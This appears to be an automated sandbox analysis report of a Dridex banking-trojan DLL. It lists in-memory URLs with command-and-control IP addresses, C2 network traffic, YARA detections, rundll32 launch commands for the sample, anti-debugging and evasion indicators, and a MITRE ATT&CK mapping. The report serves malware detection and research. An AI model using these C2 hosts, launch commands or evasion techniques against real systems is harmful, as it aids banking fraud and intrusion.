                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/x
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.670962409.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.802350875.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/#
                      Source: rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/$
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/&
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220//
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/0Z0W1
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/1-0
                      Source: loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/8
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/;
                      Source: loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/B
                      Source: loaddll32.exe, 00000000.00000003.463671472.0000000001151000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/C
                      Source: rundll32.exe, 00000004.00000002.839402088.000000000343A000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/I
                      Source: loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/K
                      Source: loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/P
                      Source: loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/W
                      Source: loaddll32.exe, 00000000.00000003.779467941.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllltb
                      Source: rundll32.exe, 00000004.00000003.819391649.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/e
                      Source: loaddll32.exe, 00000000.00000003.779467941.000000000114C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/f
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/g
                      Source: loaddll32.exe, 00000000.00000003.512614801.0000000001157000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/graphy
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ntrust
                      Source: rundll32.exe, 00000004.00000003.498135306.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/o
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.558714195.0000000001155000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690111757.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/s
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/t
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/trust
                      Source: rundll32.exe, 00000004.00000003.515187644.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/v
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/y
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/z
                      Source: rundll32.exe, 00000004.00000003.707287574.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/~
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/(6
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/J
                      Source: loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.456386588.0000000005467000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: rundll32.exe, 00000004.00000003.456386588.0000000005467000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/)
                      Source: loaddll32.exe, 00000000.00000003.684059514.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.774221370.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.833374830.00000000033D7000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/08/
                      Source: loaddll32.exe, 00000000.00000003.512614801.0000000001157000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/2
                      Source: loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/B
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/J
                      Source: loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/N
                      Source: loaddll32.exe, 00000000.00000003.505189315.0000000001151000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Zm
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/b
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der
                      Source: loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/derR
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/e
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456349641.0000000003414000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll
                      Source: loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll9
                      Source: rundll32.exe, 00000004.00000003.508903560.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h9
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/k
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/r
                      Source: rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/v
                      Source: rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://452.46.210.220/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6839F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49747 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 3.3.rundll32.exe.53db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.104db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.2d6db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.321db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e650000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.2d6db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.321db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4dbdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4dbdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.104db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e650000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.838096083.000000006E651000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.417154756.0000000003200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.439012632.0000000002D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.869577587.000000006E651000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.431444346.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.440875078.0000000001030000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.415782949.0000000000520000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6551A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6667C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66A660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E677660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E672E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E659E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E669E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E670220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E65CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66F6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E668EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6762F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E673EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E656AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6696D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E668AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6726B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66AE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66BF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E673B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E679B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66B71F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66E3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6683C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E667FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E677FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E671020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66D030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6688C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E668CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E65ACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66A0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6698DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66E0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E674CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6750A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E675CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E667564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E651570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E665DE8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6789F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6771F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66FDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E65F9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66D980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E66C590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E69E210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E6622A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllVirustotal: Detection: 7%
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/1@0/5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.14094Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.19803.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.845974920.000000006E717000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.888666799.000000006E717000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.19803.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00F2A051 push ebp; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00F2A105 push 4796B4D2h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E663930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E67CEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6C97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6C8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6C47C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79BA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79B64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E79B942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E666C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E667A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E6963A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.19803.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.830495060.0000000001910000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.840491551.00000000037F0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E662980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
